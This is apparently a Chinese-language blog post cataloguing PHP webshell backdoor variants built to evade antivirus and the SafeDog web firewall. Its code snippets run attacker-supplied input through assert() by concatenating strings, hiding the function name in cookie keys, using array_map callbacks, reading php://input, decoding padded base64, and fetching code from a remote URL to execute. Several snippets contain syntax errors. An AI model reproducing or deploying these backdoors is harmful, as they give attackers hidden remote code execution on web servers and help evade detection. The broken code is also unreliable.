php后门变种方式总结

常见免杀方式:

  • str字符串拼接闵莎
  • 多方式传参免杀
  • 回调函数
  • 远程木马
  • 伪协议后门

字符串拼接免杀:

//本例使用substr截取字符串来进行拼接执行assert函数

<?php

    $str = "abcdefs";
    $s = substr($str,-1,1);
    $ev = 'a' . $s . 'sert';
    $ev($_POST['s']);

?>

多方式传参免杀


//安全狗会对数组的值进行检测,本例使用key来进行执行函数

<?php

    $COOKIE = $_COOKIE;

    foreach($COOKIE as $key => $value){
        if($key=='assert'){
            $key($_POST['s'];)
        }
    }

?>

回调函数:

//现在应该会被安全拦截,但是大家可以自己去定义个函数,抛砖引玉

<?php

array_map('assert',$_GET);

?>

远程后门


<?php

assert($file_get_contents('http://www.0xnull.com/1.txt')); //其中网址内容为需要执行的代码,当然也可以使用base64编码等方式传入

?>

伪协议后门

调用php伪协议进行执行代码,如果被查杀可以使用一些解密函数之类的

<?php

assert(php://input);

?>

函数特性


<?php

$a = base64_decode('JF9___QT1N____UWyd____hJ10=');
assert($a);
//php会 bs64_decode 会忽略不认识的字符

?>

后言

暂时就先说这么多吧,以后想起来在写

本文链接:

http://www.f4ckweb.top/index.php/archives/7/
1 + 6 =
1 评论